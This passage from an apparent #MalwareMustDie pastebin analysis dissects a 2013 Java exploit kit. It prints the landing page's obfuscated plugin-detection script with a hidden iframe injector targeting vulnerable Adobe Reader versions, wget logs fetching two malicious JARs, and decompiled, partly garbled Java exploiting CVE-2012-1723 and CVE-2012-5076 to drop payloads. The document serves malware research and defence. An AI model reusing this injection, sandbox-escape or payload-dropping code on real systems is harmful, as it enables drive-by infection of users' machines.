b=this,d=b.$,c=b.getProperty()[0];return(a&&c&&d.compareNums(d.formatNum(a),d.formatNum(c))===0)?1:0},getProperty:function(){var f=this,g=f.$,d=f.$$,i,h={},b=(f.hasRun||f.disabled());f.hasRun=1;if(!b){var a="java_qqq990";g[a]=null;try{var c=document.createElement("script");c.type="text/javascript";c.appendChild(document.createTextNode("(function(){var e;try{if (window.java && window.java.lang && window.java.lang.System){"+g.name+"."+a+'=[window.java.lang.System.getProperty("java.version")+" ",window.java.lang.System.getProperty("java.vendor")+" "]}}catch(e){}})();'));if(g.head.firstChild){g.head.insertBefore(c,g.head.firstChild)}else{g.head.appendChild(c)}g.head.removeChild(c)}catch(i){}if(g[a]&&g.isArray(g[a])){f.result=[].concat(g[a])}}return f.result}}},applet:{$:1,results:[[null,null],[null,null],[null,null]],getResult:function(){var c=this.results,a,b=[];for(a=0;a<c.length;a++){b=c[a];if(b[0]){break}}return[].concat(b)},HTML:[0,0,0],active:[0,0,0],DummyObjTagHTML:0,DummySpanTagHTML:0,allowed:[1,1,1],VerifyTagsHas:function(c){var d=this,b;for(b=0;b<d.allowed.length;b++){if(d.allowed[b]===c){return 1}}return 0},saveAsVerifyTagsArray:function(c){var b=this,d=b.$,a;if(d.isArray(c)){for(a=0;a<b.allowed.length;a++){if(d.isNum(c[a])){if(c[a]<0){c[a]=0}if(c[a]>3){c[a]=3}b.allowed[a]=c[a]}}}},setVerifyTagsArray:function(d){var b=this,c=b.$,a=b.$$;if(a.getVersionDone===null){b.saveAsVerifyTagsArray(a.getVerifyTagsDefault())}if(a.debug||(a.verify&&a.verify.isEnabled())){b.saveAsVerifyTagsArray([3,3,3])}else{if(d){b.saveAsVerifyTagsArray(d)}}},allDisabled:function(){return this.$$.isDisabled.allApplets()},isDisabled:function(d){var b=this,c=b.$,a=b.$$;if(d==2&&!c.isIE){return 1}if(d===0||d==2){return a.isDisabled.ObjectTag()}if(d==1){return a.isDisabled.AppletTag()}},can_Insert_Query:function(b){var a=this;if(a.HTML[b]){return 0}return !a.isDisabled(b)},can_Insert_Query_Any:function(){var b=this,a;for(a=0;a<b.results.length;a++){if(b.can_Insert_Query(a)){return 1}}return 0},should_Insert_Query:function(d){var b=this,e=b.allowed,c=b.$,a=b.$$;if(!b.can_Insert_Query(d)){return 0}if(e[d]==3){return 1}if(e[d]==2.8&&!b.getResult()[0]){return 1}if(e[d]==2.5&&!a.lang.System.getProperty()[0]){return 1}if(e[d]==2.2&&!a.lang.System.getProperty()[0]&&!b.getResult()[0]){return 1}if(!a.nonAppletDetectionOk(a.version0)){if(e[d]==2){return 1}if(e[d]==1&&!b.getResult()[0]){return 1}}return 0},should_Insert_Query_Any:function(){var b=this,a;for(a=0;a<b.allowed.length;a++){if(b.should_Insert_Query(a)){return 1}}return 0},query:function(f){var h,a=this,g=a.$,d=a.$$,i=null,j=null,b=a.results,c;if((b[f][0]&&b[f][1])||(d.debug&&d.OTF<3)){return}c=g.getDOMobj(a.HTML[f],true);if(c){try{i=g.getNum(c.getVersion()+" ");j=c.getVendor()+" ";c.statusbar(g.winLoaded?" ":" ")}catch(h){}if(i&&g.isStrNum(i)){b[f]=[i,j]}else{};try{if(g.isIE&&i&&c.readyState!=4){g.garbage=true;c.parentNode.removeChild(c)}}catch(h){}}},insert_Query_Any:function(){var d=this,i=d.$,e=d.$$,l=d.results,p=d.HTML,a="&nbsp;&nbsp;&nbsp;&nbsp;",g="A.class",m=i.file.getValid(e);if(!m){return d.getResult()}if(e.OTF<1){e.OTF=1}if(d.allDisabled()){return d.getResult()}if(e.OTF<1.5){e.OTF=1.5}var j=m.name+m.ext,h=m.path;var f=["archive",j,"code",g],c=["mayscript","true"],o=["scriptable","true"].concat(c),n=e.navigator,b=!i.isIE&&n.mimeObj&&n.mimeObj.type?n.mimeObj.type:e.mimeType[0];if(d.should_Insert_Query(0)){if(e.OTF<2){e.OTF=2};p[0]=i.isIE?i.insertHTML("object",["type",b],["codebase",h].concat(f).concat(o),a,e):i.insertHTML("object",["type",b],["codebase",h].concat(f).concat(o),a,e);l[0]=[0,0];d.query(0)}if(d.should_Insert_Query(1)){if(e.OTF<2){e.OTF=2};p[1]=i.isIE?i.insertHTML("applet",["alt",a].concat(c).concat(f),["codebase",h].concat(c),a,e):i.insertHTML("applet",["codebase",h,"alt",a].concat(c).concat(f),[].concat(c),a,e);l[1]=[0,0];d.query(1)}if(d.should_Insert_Query(2)){if(e.OTF<2){e.OTF=2};p[2]=i.isIE?i.insertHTML("object",["classid",e.classID],["codebase",h].concat(f).concat(o),a,e):i.insertHTML();l[2]=[0,0];d.query(2)}if(!d.DummyObjTagHTML&&!e.isDisabled.ObjectTag()){d.DummyObjTagHTML=i.insertHTML("object",[],[],a)}if(!d.DummySpanTagHTML){d.DummySpanTagHTML=i.insertHTML("",[],[],a)};var k=e.NOTF;if(e.OTF<3&&k.shouldContinueQuery()){e.OTF=3;k.onIntervalQuery=i.handler(k.$$onIntervalQuery,k);if(!i.winLoaded){i.WLfuncs0.push([k.winOnLoadQuery,k])}setTimeout(k.onIntervalQuery,k.intervalLength)};return d.getResult()}},NOTF:{$:1,count:0,countMax:25,intervalLength:250,shouldContinueQuery:function(){var e=this,d=e.$,c=e.$$,b=c.applet,a;for(a=0;a<b.results.length;a++){if(b.HTML[a]&&!b.results[a][0]&&(b.allowed[a]>=2||(b.allowed[a]==1&&!b.getResult()[0]))&&e.isAppletActive(a)>=0){return 1}}return 0},isJavaActive:function(d){var f=this,c=f.$$,a,b,e=-9;for(a=0;a<c.applet.HTML.length;a++){b=f.isAppletActive(a,d);if(b>e){e=b}}return e},isAppletActive:function(c,a){var d=this,b=d.$$.applet.active;if(!a){b[c]=d.isAppletActive_(c)}return b[c]},isAppletActive_:function(d){var g=this,f=g.$,b=g.$$,l=b.navigator,a=b.applet,h=a.HTML[d],i,k,c=0,j=f.getTagStatus(h,a.DummySpanTagHTML,a.DummyObjTagHTML,g.count);if(j==-2){return -2}try{if(f.isIE&&f.verIE>=b.minIEver&&f.getDOMobj(h).object){return 1}}catch(i){}for(k=0;k<a.active.length;k++){if(a.active[k]>0){c=1}}if(j==1&&(f.isIE||((b.version0&&l.javaEnabled()&&l.mimeObj&&(h.tagName=="object"||c))||b.lang.System.getProperty()[0]))){return 1}if(j<0){return -1}return 0},winOnLoadQuery:function(c,d){var b=d.$$,a;if(b.OTF==3){a=d.queryAllApplets();d.queryCompleted(a[1],a[2])}},$$onIntervalQuery:function(d){var c=d.$,b=d.$$,a;if(b.OTF==3){a=d.queryAllApplets();if(!d.shouldContinueQuery()||(c.winLoaded&&d.count>d.countMax)){d.queryCompleted(a[1],a[2])}}d.count++;if(b.OTF==3){setTimeout(d.onIntervalQuery,d.intervalLength)}},queryAllApplets:function(){var g=this,f=g.$,e=g.$$,d=e.applet,b,a,c;for(b=0;b<d.results.length;b++){d.query(b)}a=d.getResult();c=a[0]?true:false;return[c,a[0],a[1]]},queryCompleted:function(c,f){var e=this,d=e.$,b=e.$$;if(b.OTF>=4){return}b.OTF=4;var a=e.isJavaActive();b.setPluginStatus(c,f,0);if(b.funcs){d.callArray(b.funcs)}if(d.onDoneEmptyDiv){d.onDoneEmptyDiv()}}},zz:0},adobereader:{mimeType:"application/pdf",navPluginObj:null,progID:["AcroPDF.PDF","PDF.PdfCtrl"],classID:"clsid:CA8A9780-280D-11CF-A24D-444553540000",INSTALLED:{},pluginHasMimeType:function(d,c,f){var b=this,e=b.$,a;for(a in d){if(d[a]&&d[a].type&&d[a].type==c){return 1}}if(e.getMimeEnabledPlugin(c,f)){return 1}return 0},getVersion:function(l,j){var g=this,d=g.$,i,f,m,n,b=null,h=null,k=g.mimeType,a,c;if(d.isString(j)){j=j.replace(/\s/g,"");if(j){k=j}}else{j=null}if(d.isDefined(g.INSTALLED[k])){g.installed=g.INSTALLED[k];return}if(!d.isIE){a="Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";if(g.getVersionDone!==0){g.getVersionDone=0;b=d.getMimeEnabledPlugin(g.mimeType,a);if(!j){n=b}if(!b&&d.hasMimeType(g.mimeType)){b=d.findNavPlugin(a,0)}if(b){g.navPluginObj=b;h=d.getNum(b.description)||d.getNum(b.name);h=d.getPluginFileVersion(b,h);if(!h&&d.OS==1){if(g.pluginHasMimeType(b,"application/vnd.adobe.pdfxml",a)){h="9"}else{if(g.pluginHasMimeType(b,"application/vnd.adobe.x-mars",a)){h="8"}}}}}else{h=g.version}if(!d.isDefined(n)){n=d.getMimeEnabledPlugin(k,a)}g.installed=n&&h?1:(n?0:(g.navPluginObj?-0.2:-1))}else{b=d.getAXO(g.progID[0])||d.getAXO(g.progID[1]);c=/=\s*([\d\.]+)/g;try{f=(b||d.getDOMobj(d.insertHTML("object",["classid",g.classID],["src",""],"",g))).GetVersions();for(m=0;m<5;m++){if(c.test(f)&&(!h||RegExp.$1>h)){h=RegExp.$1}}}catch(i){}g.installed=h?1:(b?0:-1)}if(!g.version){g.version=d.formatNum(h)}g.INSTALLED[k]=g.installed}},zz:0}};actojack.initScript();jimyjoke = actojack.getVersion("Java");if (typeof jimyjoke == "string") {jimyjoke = jimyjoke.split(",");if (jimyjoke[3].length == 1) {jimyjoke = "" + jimyjoke[1] + "0" + jimyjoke[3];} else {jimyjoke = "" + jimyjoke[1] + jimyjoke[3];}} else {jimyjoke = 0;}pdfver = actojack.getVersion("AdobeReader");if (typeof pdfver == "string") {pdfver = pdfver.split(",");pdfver[3] = pdfver[3].substring(0, 1);pdfver = parseInt(pdfver.join(""), 10);} else {pdfver = 0;}
  83.         function ifr(abc) {var dh = document.createElement("iframe");dh.setAttribute("width", 1);dh.setAttribute("height", 1);dh.setAttribute("src", abc);document.body.appendChild(dh);};function pdf(){try{if((pdfver>=8000&&pdfver<=8200)||(pdfver>=9000&&pdfver<=9301)){ifr("lacecape.php");}} catch(e){}}setTimeout(pdf,2110);</script></html>
  84.  
  85. // see the applet header, there are only 2 downloads in the landing page which lead to jars...
  86.  
  87. ================================================================================
  88.  
  89. //=====================
  90. //THE FIRST JAR..
  91. //=====================
  92.  
  93. // let's go to the first applet:
  94.  
  95. <applet code="ors.class" archive="rgerding/jimmdemy.jar" width="1" height="1">
  96. <param name="bhjwfffiorjwe" value="0jfX19NXhX1MMX0ZltNjk9k/agtjNgs9hgZpBVthZX8.:jfg2.8/N/sljhaf0f/2lMBM9atrZag3Bd38oXfVNsB.fs0jC1BhtgeMZ/8j.30tajCCNNZtt9sX/0Ndga98shkk0CsCVN3VgB0gVkfs09kZi30MBdV..aNsfVftf3nV99fkgt2tBf/jas1.o2sXt2XtfnVh./hj8.itVfkaftCoC/30aCV399d/B1/3M.j8gBljBsn33h/khB9efZZglsj3thkNasMNg/j8.glXXtJZ8.CdXMNdt33ststhohXMZ/38dw92B8gl32u.8Zkg30g39BX21Xkl2lCXaXMjfdj8kC/aZ/s33sf280C2ZdMk9Cj3sd2/1jdaN/adltfB/kjNlNf/k3gaMhBk/8aknVt3/d.MjukXjZldVCdfs/dh2C1ekk3st.f0n.dCdkaZgtB120/Nhj.CjZ.al0jpjCgjC0.Ch3B2lCjZdp">
  97. </applet>
  98.  
  99. // this leads to the jar with the below Urls,
  100. // passing the bhjwfffiorjwe params to the ors.class to be processed..
  101.  
  102. // let's fecth the h00p://davidsonfrc89.net/Jdowu32ds2s/rgerding/jimmdemy.jar
  103.  
  104. --18:33:00--  h00p://davidsonfrc89.net/Jdowu32ds2s/rgerding/jimmdemy.jar
  105.            => `jimmdemy.jar'
  106. Resolving davidsonfrc89.net... seconds 0.00, 217.23.6.57
  107. Caching davidsonfrc89.net => 217.23.6.57
  108. Connecting to davidsonfrc89.net|217.23.6.57|:80... seconds 0.00, connected.
  109.  :
  110. GET /Jdowu32ds2s/rgerding/jimmdemy.jar HTTP/1.0
  111. User-Agent: #MalwareMustDie Playing with your jars
  112. Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
  113. n;q=0.8,image/png,*/*;q=0.5
  114. Host: davidsonfrc89.net
  115. Connection: Keep-Alive
  116. Accept-Language: en-us,en;q=0.5
  117. Accept-Encoding: gzip,deflate
  118. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  119. Keep-Alive: 300
  120. HTTP request sent, awaiting response...
  121.  :
  122. HTTP/1.1 200 OK
  123. Server: nginx/1.2.6
  124. Date: Tue, 08 Jan 2013 09:32:58 GMT
  125. Content-Type: application/x-java-archive
  126. Content-Length: 9465
  127. Connection: keep-alive
  128. Last-Modified: Sun, 30 Dec 2012 11:22:55 GMT
  129. ETag: "39a0afc-24f9-4d2101e35e1c0"
  130. Accept-Ranges: bytes
  131.  :
  132. 200 OK
  133. Registered socket 1896 for persistent reuse.
  134. Length: 9,465 (9.2K) [application/x-java-archive]
  135. 100%[====================================>] 9,465         27.48K/s
  136. 18:33:01 (27.40 KB/s) - `jimmdemy.jar' saved [9465/9465]
  137.  
  138. //FIRST JAR's Malicious Activity quick analysis
  139. // Exploit used: CVE-2012-1723
  140.  
  141. // grab the passed applet parameter here;
  142. // ors.class
  143. import java.applet.Applet;
  144. import java.lang.reflect.Method;
  145.  
  146. public class ors extends Applet
  147. { public static String B;
  148.   public static String M;
  149.   public static String C = G.L("*_uR+P*Q)O5Wc").replace(G.L("T)R*Q(S5O-"), G.L(" Sv"));
  150.   public static String[] I;
  151.  
  152. // processing & calling G.class...
  153. public static Object L(String a, String a, Object a)
  154.   {  try
  155.     { String str1 = G.L("tR+^+P(~t\017uR+^&Q&R+P$\\'Z'Q*R\004\017z^&P(Q$\\'Z+P$Q&]*P\036b\025");
  156.       Object localObject = G.L("tR+^+P(~t\017uR+^&Q&R+P$\\'Z'Q*R\004\017z^&P(Q$\\'Z+P$Q&]*P\036b\025");
  157.       localObject = G.L("\016-Q*R\004\016u\017(Q$\\+E(R+P$\\'Z'R+^&Q*R\004P(E{b\004Q*^+\\'P*b\025");
  158.       localObject = Class.forName(a);
  159.       String str2 = G.L("");
  160.       int tmp41_40 = 1; tmp41_40; a = a.getMethod(new Class[0], tmp41_40);
  161.       localObject = G.L("\003(Q*R\004\016uQ*R\004\016uQ*R\004\016uQuR+^&Q$\\(Q*^&] ](Q*^&] ]+P(~{qxQ$\\'Z&^+P(E(P+^&\001\004|x\003{");
  162.       int tmp61_60 = 1; tmp61_60; return a.invoke(new Object[0], tmp61_60);
  163.           :
  164.  
  165. // here's the exploit exists...
  166. // G.class :
  167. import java.io.InputStream;
  168. import java.security.ProtectionDomain;
  169.  
  170. public class G extends ClassLoader //<== mark the ClassLoader a pattern of CVE-2012-1723
  171.      :
  172.  
  173.   public static String L(String a)
  174.   { int tmp5_4 = 4;                   // forming public static String to be maps to memory...
  175.     int tmp31_28 = a.length();
  176.     int tmp35_34 = 1;
  177.     tmp35_34;
  178.     int j;
  179.     int ? = tmp35_34;
  180.     int k = tmp31_28;
  181.     int tmp45_41 = (j = new char[tmp31_28] - 1);
  182.     tmp45_41;
  183.     int i = (0x3 ^ 0x5) << 3 ^ (0x3 ^ 0x5);
  184.     if ((4 << 3 ^ 0x1) >= 0)
  185.     { int tmp54_53 = j;             // some multiple attempts for memory plantations..
  186.       j--;
  187.       ?[tmp54_53] = (char)(a.charAt(tmp54_53) ^ i);
  188.       int tmp72_71 = j;
  189.       j--;
  190.       ?[tmp72_71] = (char)(a.charAt(tmp72_71) ^ k);
  191.     }
  192.     tmp45_41.<init>(?);
  193.     return tmp5_4 << tmp5_4 ^ (0x3 ^ 0x5) << 1;    }
  194.  
  195.  
  196. // act of sec bypass to download+saving payloads...
  197.  
  198. public static void L(G a)
  199.   {  try
  200.     {  String str = G.L("tR+^&Q*R$Q&]*P\036b\025");
  201.       InputStream tmp16_13 =
  202.         a.getResourceAsStream(m.L("V'RqT3V,D"));
  203.       int i;
  204.       int tmp25_24 = 1; tmp25_24;
  205.       int ?;
  206.       Object localObject = K.L();
  207.       new byte[
  208.         i = tmp16_13.available()]
  209.         .read(? = tmp25_24,
  210.         0, i);
  211.       int tmp43_42 = ?;
  212.       localObject = G.L(
  213.         tmp16_13
  214.         .defineClass("axe", tmp43_42, 0, tmp43_42.length, (ProtectionDomain)localObject));// <=== here
  215.       return;
  216.             a;    }
  217.     catch (Exception localException1){}} // the local exception wasn't defined..
  218.  
  219.  
  220. // what's in the axe.class?
  221. // the saving of payload via localObject3 by new FileOutputStream
  222. // using strings fromed by localObject2 & localObject2
  223.  
  224. import java.io.FileOutputStream;
  225. import java.io.InputStream;
  226. import java.security.PrivilegedExceptionAction;
  227.  
  228. public class axe
  229.   implements PrivilegedExceptionAction
  230.   {
  231.   public Object run()
  232.   {
  233.     String[] arrayOfString;
  234.     Object localObject1;
  235.     Object localObject2;
  236.     InputStream localInputStream;
  237.     try
  238.     {
  239.       String str1 = L();
  240.       arrayOfString = ors.I;
  241.       localObject1 = G.L("P*^*^*Q(P)R*Q$P+R*S(P+^*Q(P)R*Q(S5O-");
  242.       localObject1 = G.L("P*^*^*Q(P)R*Q$P+R*S(P+^*Q(P)R*Q(S5O-");
  243.       long l = System.currentTimeMillis();
  244.       localObject1 = G.L(")N)");
  245.       new StringBuilder();
  246.       int tmp59_58 = 1; tmp59_58;
  247.       int tmp61_59 = tmp59_58; tmp61_59[0] = Long.valueOf(l); String str4 = String.format(new Object[1], tmp61_59);
  248.       String str2 = G.L("U!Rb\023?\026cUlE8W>Bl");
  249.       int tmp87_86 = 1; tmp87_86;
  250.       int tmp89_87 = tmp87_86; tmp89_87[0] = localObject1; str2 = String.format(new Object[1], tmp89_87);
  251.       String str3 = G.L("P*^*^*Q(P+W(P+T)R*Q(S5O-");
  252.       localObject2 = G.L("*P$P$P+W(P+T)R*Q(S5O-");
  253.       localObject2 = localObject1 + str4;
  254.       localInputStream = A(arrayOfString[localObject1.intValue()]);
  255.  
  256.       Object localObject3 = new FileOutputStream((String)(String)localObject2);
  257.       int tmp198_197 = 1; tmp198_197; int ? = tmp198_197;
  258.       int i;
  259.       while ((i = localInputStream.read(?, 0, ?.length)) != -1)
  260.       {  ((FileOutputStream)localObject3).write(?, 0, i);
  261.         tmpTernaryOp = localInputStream;
  262.         continue;
  263.         new byte[1024];
  264.       }
  265.       localInputStream.close();
  266.       Object tmp243_241 = localObject3; tmp243_241.flush(); tmp243_241.close();
  267.  
  268.       M((String)(String)
  269.         (localObject3 = (String)(String)localObject2));
  270.       localObject3 = localObject1 = Integer.valueOf((localObject2 = localObject1)
  271.         .intValue() + 1);
  272.       localObject3 = localObject2;
  273.       (localInputStream = A(localObject2 = ""))
  274.         .close();
  275.       tmpTernaryOp = 0;    }
  276.     catch (Exception localException1)  {    }
  277.     return null; }
  278.  
  279.  
  280. //================================
  281.  
  282. //THE SECOND JAR..CVE-2012-5076
  283.  
  284. //================================
  285.  
  286. // the other jar was downloaded here:
  287.  
  288. //also fetch the h00p://davidsonfrc89.net/Jdowu32ds2s/rgerding/torylane.jar
  289.  
  290. --18:36:03--  h00p://davidsonfrc89.net/Jdowu32ds2s/rgerding/torylane.jar
  291.            => `torylane.jar'
  292. Resolving davidsonfrc89.net... seconds 0.00, 217.23.6.57
  293. Caching davidsonfrc89.net => 217.23.6.57
  294. Connecting to davidsonfrc89.net|217.23.6.57|:80... seconds 0.00, connected.
  295.  :
  296. GET /Jdowu32ds2s/rgerding/torylane.jar HTTP/1.0
  297. User-Agent: #MalwareMustDie has to change the train....
  298. Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
  299. n;q=0.8,image/png,*/*;q=0.5
  300. Host: davidsonfrc89.net
  301. Connection: Keep-Alive
  302. Accept-Language: en-us,en;q=0.5
  303. Accept-Encoding: gzip,deflate
  304. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  305. Keep-Alive: 300
  306.  :
  307. HTTP request sent, awaiting response...
  308.  :
  309. HTTP/1.1 200 OK
  310. Server: nginx/1.2.6
  311. Date: Tue, 08 Jan 2013 09:36:01 GMT
  312. Content-Type: application/x-java-archive
  313. Content-Length: 5502
  314. Connection: keep-alive
  315. Last-Modified: Tue, 25 Dec 2012 05:55:36 GMT
  316. ETag: "39a0afd-157e-4d1a6f66da600"
  317. Accept-Ranges: bytes
  318.  :
  319. 200 OK
  320. Registered socket 1896 for persistent reuse.
  321. Length: 5,502 (5.4K) [application/x-java-archive]
  322. 100%[====================================>] 5,502         18.72K/s
  323. 18:36:04 (18.70 KB/s) - `torylane.jar' saved [5502/5502]
  324.  
  325.  
  326. MD5:    ae66fc69244abec22f20384356806ad2
  327. File size:      5.4 KB ( 5502 bytes )
  328. File name:      torylane.jar
  329. File type:      JAR
  330. Detection ratio:        1 / 46
  331. Analysis date:  2013-01-08 12:50:22 UTC ( 0 分 ago )
  332. https://www.virustotal.com/file/92ad670f3d32c91afffc60c54e9c5d19095d827ec86d2d89ebfa0a7856fa93e8/analysis/1357649422/
  333.  
  334.  
  335. // applet params passed:
  336.  
  337. <applet code="gee.class" archive="rgerding/torylane.jar" width="1" height="1">
  338. <param name="bhjiorjwe" value=".f//9jkMhNVgB1l2tt0djf3j32t21/Z.M0.p1C3X3a/g:1h.ZM2Zs/t1Z/.g92/l0flsta8rV/gXth/1oV3dl0Vj1sM1VMlZjdesXffXhsdtfN1h2VlNtBfCf.8tgaB020sa3fsBkBsX0g8gdlka9jXhiBkVXtV/Cah1fZ9d1gnghX/t39jtt.f2d2k9o.2htZjV2nt/j2ktdXih1NgVfC0oj/NZ90j19NB9.8M98.gaVXa8lMnCC2f3ZtsegXCsd331tZ00hlZdN/N8aB1ktgJ980Vf09Vdjg2Zj0k1og3lNhft8wkaZ/dZf.uftCC0Mf/32lMl9C8k2N/V8dV0Md1kh/CC//sCBBh.8f22/131h132s0BV/dgh//XV3kj2s3jg0jgBXkNajljC8sMXn0lZ/N93tuM9d0CgCtdl8gVMBk0eVMfNB1tjn8Ndhflg0t3CMX.aXa.//0hN3akpfhV8l0s/hkgjNZVkgp">
  339. </applet>
  340.  
  341. // the gee.class... th epassed applet params goes here...
  342. import java.applet.Applet;
  343. import java.io.InputStream;
  344. import java.lang.reflect.Constructor;
  345. import java.lang.reflect.Method;
  346.  
  347. public class gee extends Applet
  348.   public static java.net.URL g(String a) // <==== see the "a" object = url..
  349.   {
  350.  
  351. // pet.class... the url logic buider
  352.  
  353. import java.security.PrivilegedExceptionAction; // Attempt to to use Security exception...
  354.  
  355. public class pet
  356.   implements PrivilegedExceptionAction {} // Security exception performed...
  357.    public static String A(String a)       //here!
  358.     {
  359.     int tmp25_22 = a.length();
  360.     int tmp29_28 = 1;
  361.     tmp29_28;
  362.     int j;
  363.     int ? = tmp29_28;
  364.     int k = tmp25_22;
  365.     int tmp39_35 = (j = new char[tmp25_22] - 1);
  366.     tmp39_35;
  367.     int i = 4;
  368.     ((0x3 ^ 0x5) << 3 ^ (0x2 ^ 0x5));
  369.     if (tmp39_35 >= 0)
  370.     {
  371.       int tmp49_48 = j;
  372.       j--;
  373.       ?[tmp49_48] = (char)(a.charAt(tmp49_48) ^ i);
  374.       int tmp67_66 = j;
  375.       j--;
  376.       ?[tmp67_66] = (char)(a.charAt(tmp67_66) ^ k);
  377.     }
  378.     ((0x3 ^ 0x5) << 4 ^ 0x1).<init>(?);
  379.     return new java/lang/String;  }
  380.  
  381. //calling zin.classs & pet.class for string builder...
  382.    public static Object A(Class a)
  383.    {
  384.     String str1 = pet.A("Pl]cQ`\017bP`QcQ`P`Pl]cQ`lQ`P");
  385.     str1 = zin.A("-\037&\035<\017&5?\031&");
  386.     String str2 = pet.A("c_nPbS<QcSbSbPbScScQ`P`Pl]cQ`lQ`P");
  387.     str1 = new StringBuffer(str1).reverse().toString();
  388.     str2 = zin.A("");
  389.     return A(pet.A("]eAe\031hVjP*thVwD"), str1, a);
  390.  
  391. // zin.class... the string saved file builder... HERE GOES THE PAYLOAD LOGIC
  392.  
  393. import java.io.FileOutputStream;
  394. import java.io.InputStream;
  395.    :
  396.  Object localObject3 = new FileOutputStream((String)localObject1);
  397.       int tmp170_169 = 1; tmp170_169; int ? = tmp170_169;
  398.       int i;
  399.       while ((i = localInputStream.read(?, 0, ?.length)) != -1)
  400.       { ((FileOutputStream)localObject3).write(?, 0, i);
  401.         tmpTernaryOp = localInputStream;
  402.         continue;
  403.         new byte[1024];    }
  404.  
  405. // K.class has the exploit:
  406. public class K
  407. {
  408.   public static String c;
  409.   public static String J;
  410.   public static String l;
  411.   public static String F;
  412.   public static String h;
  413.   public static String d;
  414.  
  415. static
  416.   { // classes to attack the Java security mode, typical CVE-2012-5076
  417.     K.h = "com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory";
  418.     K.l = "com.sun.org.glassfish.gmbal.util.GenericConstructor";
  419. // Exploit strings
  420.     K.J = new StringBuffer(zin.A("\016-\030)\023\004\017;\035$?;\t'\0211\022'\022\tR&\023&\035f\031#\023>\022!R&\t;")).reverse().toString();
  421. // Obfusctation of the method commands...
  422.     K.F = "create";
  423.     K.d = "loadClass"; // loadClass method to load a malicious payload class....
  424.     K.c = "getMethod";
  425.    
  426. -----
  427. #MalwareMustDie | @unixfreaxjp ~]$ date
  428. Tue Jan  8 21:36:28 JST 2013
  429. Title:
  430. #MalwareMustDie - Guide JAR CVE-2012-1723 + CVE-2012-5076
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top